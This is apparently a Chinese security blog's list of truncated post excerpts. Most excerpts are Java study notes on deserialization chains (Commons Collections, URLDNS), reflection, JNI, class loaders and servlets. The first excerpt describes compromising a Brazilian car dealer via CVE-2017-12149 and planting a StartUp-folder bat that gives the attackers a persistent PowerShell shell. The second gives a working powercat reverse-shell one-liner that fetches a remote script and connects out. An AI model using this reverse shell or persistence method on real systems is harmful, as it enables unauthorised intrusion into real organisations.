巴西某汽车销售商 入口: CVE-2017-12149 获得入口机 入口点持久化 向 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp 植入恶意bat，开机自动向我们的CS弹回shell（powershell） ...

Windows 反弹shell powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 ...

CC链，逃不掉的。 CC链1的漏洞版本在apache commons collections 3.21以下 。分为两条，一个TransformerMap链一个LazyMap链 Transformer Map 链 RCE原理 我在网上找到了一则利用代码，虽然这个利用代...

代理的作用，就是在原有类的代码不发生改动的情况下，添加新功能。起到一个修饰器的作用。 假设我们现在有个类，用于打印helloworld class hello{ public void gogo(){System.out.println("Hello Wrol...

JNI是JAVA的一个接口，用来实现c/c++调用，为JAVA提供了一个操纵底层的能力。 JNI HelloWorld java IDE：idea C IDE：vs2019 1.写好JAVA文件，定义好native方法。 public class test { static...

类加载器，即ClassLoader，用于加载JAVA类文件（.class)到JVM中 ClassLoader 在JVM类加载器中最顶层的是Bootstrap ClassLoader(引导类加载器)、Extension ClassLoader(扩展类加载器)、App ClassLoader(系...

看到这篇文章我不禁陷入深思，我五月上来就搞这个链，真的是痛苦不堪。现在开始重拾JAVA反序列化，根据P神的文章，先来一条简单的链：URLDNS。 URLDNS 这个链的主要作用是，可以通过反序列化的手段，...

反射的基础 反射是java的一个特性，用于获取类的详细信息（方法，变量），并可以执行类中的方法。 获得一个类的类对象 要获取类的详细信息或执行其中的方法，首先肯定是要获取到那个类的类对象 方法...

本文章部署平台:TOMCAT 10 Servlet Servlet生命周期 1.调用init()方法进行初始化 init()方法在第一次创建servlet时被调用，用于进行初始化操作。 public void init() throws ServletException{.....